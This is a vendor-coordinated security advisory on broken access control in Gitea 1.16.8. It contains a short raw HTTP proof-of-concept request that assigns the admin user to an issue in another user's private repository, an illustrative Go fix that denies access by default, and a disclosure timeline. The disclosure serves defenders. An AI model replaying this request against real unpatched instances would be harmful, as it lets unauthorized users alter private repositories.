usd-2022-0025 | Broken Access Control in Issue Assignees

Advisory ID: usd-2022-0025
Product: Gitea
Affected Version: 1.16.8
Vulnerability Type: https://cwe.mitre.org/data/definitions/284.html
Security Risk: Medium
Vendor URL: https://gitea.io/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
Advisory Status: Closed
CVE number: Not requested yet
CVE Link: Not requested yet
First Published: Not published yet
Last Update: 2022-06-30

Description

Gitea allows users to assign other users to issues.
Due to improper access control, any authenticated user can assign a user to arbitrary issues.

Proof of Concept

In the request below, the issue with id 4 does not belong to the authenticated user.
The repo where this issue lives is a private repo of another user.
The user with ID 1 is the admin user, who is assigned to issue 4 by an arbitrary user that should normally not have the permissions to do this.

POST /testuser/test222/issues/assignee HTTP/1.1
Host: localhost:3000
Content-Length: 105
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Origin: http://localhost:3000
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XXX
Connection: close

_csrf=fG[REDACTED]&action=&issue_ids=4&id=1

Fix

It is recommended to restrict access to sensitive functions or information by default.
Required access privileges should be granted explicitly by a global access control mechanism.
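As an added illustration of the deny-by-default principle, and not Gitea's own code, the following hypothetical Go logic refuses an assignee request unless the actor has write access on the repository named in the URL and every submitted issue id belongs to that same repository. The data model, user ids and repository ids are constructed for the example.

```go
package main

import (
	"errors"
	"fmt"
)

// Constructed stand-ins for the data model; not Gitea's own types.
type Issue struct{ ID, RepoID int64 }
type Repo struct{ Writers map[int64]bool } // user IDs with write access
type Store struct {
	Repos  map[int64]*Repo
	Issues map[int64]*Issue
}

var ErrForbidden = errors.New("forbidden")

// AssignIssues is the deny-by-default check for an assignee request: the actor
// needs write access on the repository named in the URL, and every issue id in
// the form must belong to that same repository; either failure rejects the whole
// request, so an issue from another user's private repo is unreachable here.
func (s *Store) AssignIssues(actorID, urlRepoID int64, issueIDs []int64, assigneeID int64) error {
	repo, ok := s.Repos[urlRepoID]
	if !ok || !repo.Writers[actorID] {
		return fmt.Errorf("repo %d: %w", urlRepoID, ErrForbidden)
	}
	for _, id := range issueIDs {
		issue, ok := s.Issues[id]
		if !ok || issue.RepoID != urlRepoID {
			return fmt.Errorf("issue %d: %w", id, ErrForbidden)
		}
	}
	// All checks passed: the assignment of assigneeID would be persisted here.
	return nil
}

// sampleStore holds constructed data: user 5 writes to repo 1 (issue 10), user 7
// writes to private repo 2 (issue 4), user 1 stands for the admin in the PoC.
func sampleStore() *Store {
	return &Store{
		Repos:  map[int64]*Repo{1: {Writers: map[int64]bool{5: true}}, 2: {Writers: map[int64]bool{7: true}}},
		Issues: map[int64]*Issue{10: {ID: 10, RepoID: 1}, 4: {ID: 4, RepoID: 2}},
	}
}

func main() {
	s := sampleStore()
	fmt.Println(s.AssignIssues(5, 1, []int64{4}, 1))  // issue 4: forbidden
	fmt.Println(s.AssignIssues(5, 1, []int64{10}, 5)) // <nil>
}
```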

References

Timeline

  • 2022-06-22: Vulnerability identified by Christian Pöschl
  • 2022-06-22: First contact request
  • 2022-07-01: Investigation started by vendor
  • 2022-07-15: Vendor confirms remediation

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.